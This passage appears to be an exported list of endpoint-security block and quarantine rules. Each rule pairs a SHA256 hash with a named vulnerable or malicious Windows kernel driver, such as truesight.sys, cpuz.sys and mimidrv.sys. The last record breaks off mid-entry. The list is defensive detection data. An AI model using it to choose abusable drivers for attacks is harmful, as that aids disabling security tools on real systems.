"id": "2cad807a-cda1-51f3-a388-295c88e6161d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818765Z", + "creation_date": "2026-03-23T11:45:31.818769Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "7c24049cf3a07da50239e60c6613bb8c1ed1334d26a194a2a74b531a12fd8062", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cb3846e-9388-5a91-92f7-d43c72264947", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817232Z", + "creation_date": "2026-03-23T11:45:31.817234Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817240Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "950600f5b8c3d412f8d323761a37d924ce21d7044e1d60751f12a760a9c576a2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cbfe323-e6ef-5a51-8661-b5a1669bb773", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492356Z", + "creation_date": "2026-03-23T11:45:31.492358Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492363Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be0e9d9ffea406e92801dd5db568baf4ba033e0b519b7991f6f3e14cc107a719", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cbfecb3-7437-5357-8676-ccbddd697a9b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818469Z", + "creation_date": "2026-03-23T11:45:30.818471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818477Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "582b62ffbcbcdd62c0fc624cdf106545af71078f1edfe1129401d64f3eefaa3a", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cc87e45-adb7-5990-8459-9a83bf8fb153", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480806Z", + "creation_date": "2026-03-23T11:45:30.480808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480818Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5be106b92424b12865338b3f541b3c244dce9693fe15f763316f0c6d6fc073ee", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cd642e0-f30b-5d4a-ad70-ddf9ce4ab906", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812408Z", + "creation_date": "2026-03-23T11:45:31.812412Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812420Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96c45ce5fbbf8f5ac78b1fd7c3018a155158699209ccfc76c75e781e79063197", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cd70ed8-437c-5b22-8dcf-5316cd4f3006", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977747Z", + "creation_date": "2026-03-23T11:45:29.977749Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977754Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4", + "comment": "Vulnerable Kernel Driver (aka Lv561av.sys) [https://www.loldrivers.io/drivers/47a351ee-8abe-40d8-bc2b-557390fa0945/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ce38a23-d8db-5b66-9565-df1c397d663c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825687Z", + "creation_date": "2026-03-23T11:45:30.825689Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825695Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f256356057405d71b89957a70fe19839aefc306a9031a96ad88d0cc9984e316", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ce71100-4a00-534e-ace0-3c5bc3bfe386", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822442Z", + "creation_date": "2026-03-23T11:45:30.822444Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822449Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da99d80082f3492080cd036d121d6d017b9e8d09edcd59e099b1755aa7e9be16", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ce988f2-c60d-50c8-b76c-bb80567d8dc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619683Z", + "creation_date": "2026-03-23T11:45:29.619685Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619690Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1deae340bf619319adce00701de887f7434deab4d5547a1742aeedb5634d23c6", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cead37d-a579-549a-a769-670133d2de75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823257Z", + "creation_date": "2026-03-23T11:45:31.823260Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823268Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a051ab0a007d473083fac3cb8b7ef1a1a89af0a55b77e1795c5ea3917c4280cd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cf3c576-3535-5b70-887e-7f8530b64044", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481197Z", + "creation_date": "2026-03-23T11:45:31.481201Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb270e71a7af28e15663fee5aead3ecdf17107d57fe6a3ea70fc47085bfadfeb", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cf45311-f53d-532f-87a4-e3545d422448", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825887Z", + "creation_date": "2026-03-23T11:45:31.825890Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9cdf3495a1bb54e0c4393144d9a03c1a677e44e1a4bd9a25535f11af95055d7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cfa0b06-3d5e-51a9-a287-9c20cc2a4701", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:30.472951Z", + "creation_date": "2026-03-23T11:45:30.472954Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472963Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40da0adf588cbb2841a657239d92f24b111d62b173204b8102dd0e014932fe59", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2cfe9432-2983-56d3-9095-235d3d2a22f2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472025Z", + "creation_date": "2026-03-23T11:45:30.472028Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472037Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65deb5dca18ee846e7272894f74d84d9391bbe260c22f24a65ab37d48bd85377", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d005334-b6cc-5a6b-b1bb-5533904dba30", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825888Z", + "creation_date": "2026-03-23T11:45:30.825890Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "365ab6a51b569492922d452c351c3c2b6a2cca74dd2078d9905bb9065d374bab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d0167f1-3c42-5192-8ea3-64162ac93d73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829079Z", + "creation_date": "2026-03-23T11:45:30.829081Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.829086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4f8ebedf80fdb13ccff95bfa4dc85feeb9b09e4dc5b4ede71a17e13796e5fe5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d0bed4a-ab1a-539b-b8fb-3ab612a9692e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822237Z", + "creation_date": "2026-03-23T11:45:31.822240Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822245Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a14f1b5d2f9de3246277b7a1257933ade03c6c2e2f6f4a5b28529f23126a706c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d0d8f06-f34e-53bb-a7bc-c7fb849747aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815455Z", + "creation_date": "2026-03-23T11:45:31.815457Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815463Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eae1c884154b86ecf7bf42672704dafad2c9c276d67da490a127ea8fe17e0ede", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d0db0dd-6418-5ec1-ac67-44a9fb874a38", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974592Z", + "creation_date": "2026-03-23T11:45:29.974594Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974600Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "d3227dc2e8f83258810cf43719f02a8d52648eb17939fddd79fd70155a47305d", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d18ced3-9ca5-5f6b-bf51-e188d0bbb008", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604754Z", + "creation_date": "2026-03-23T11:45:29.604756Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604761Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d22a591-e95e-5534-b3e8-c9efc27060f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469515Z", + "creation_date": "2026-03-23T11:45:30.469518Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469526Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab5b4c34bc49b3ae9c6a7607d97b2bd63d9a1b3c669ef18c8865c8a50a3254a9", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d27399a-5782-5e4f-93c0-4ff83d9ba94c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.603867Z", + "creation_date": "2026-03-23T11:45:29.603884Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.603890Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "35a12d81f7062a22644b500d91b1603b4f97756ad165c3ea571e7fef55c24162", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d287735-a79a-5370-9984-8e5b12bc423f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616668Z", + "creation_date": "2026-03-23T11:45:29.616670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616676Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3cb75429944e60f6c820c7638adbf688883ad44951bca3f8912428afe72bc134", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d326022-537d-5b39-b94a-e45fe2370021", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145800Z", + "creation_date": "2026-03-23T11:45:31.145802Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": 
